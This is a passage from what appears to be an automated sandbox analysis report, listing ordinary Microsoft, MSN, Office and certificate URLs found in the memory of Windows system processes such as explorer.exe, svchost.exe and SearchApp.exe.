            Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SearchApp.exe, 0000000B.00000000.1827278453.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: SearchApp.exe, 0000000B.00000000.1827278453.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: SearchApp.exe, 0000000B.00000000.1882247398.0000024B54FDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.skype.com/Mention
            Source: explorer.exe, 00000003.00000000.1714711719.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1716586529.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1715110391.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.3035088754.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: svchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: explorer.exe, 00000003.00000002.3110068499.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1717782304.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
            Source: SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: SearchApp.exe, 0000000B.00000000.1824776823.0000024340CDC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
            Source: explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000003.00000002.3012213853.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1712577983.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713118694.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000002.3084368988.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: SearchApp.exe, 0000000B.00000000.1820370567.0000024339C3F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comC
            Source: explorer.exe, 00000003.00000002.3084368988.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
            Source: svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000006.00000002.3014615006.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1794985921.0000019E297F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
            Source: SearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1801563347.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2989471561.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: SearchApp.exe, 0000000B.00000000.1836526341.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owa
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
            Source: SearchApp.exe, 0000000B.00000000.1888579626.0000024B5549B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/owa
            Source: SearchApp.exe, 0000000B.00000000.1879521352.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
            Source: SearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rafd.https://r.a
            Source: SearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://raka.rms_noco-VK
            Source: SearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
            Source: SearchApp.exe, 0000000B.00000000.1834242505.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.html
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: SearchApp.exe, 0000000B.00000000.1887670634.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1888726531.0000024B554A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
            Source: SearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.3110068499.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1717782304.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ng.com
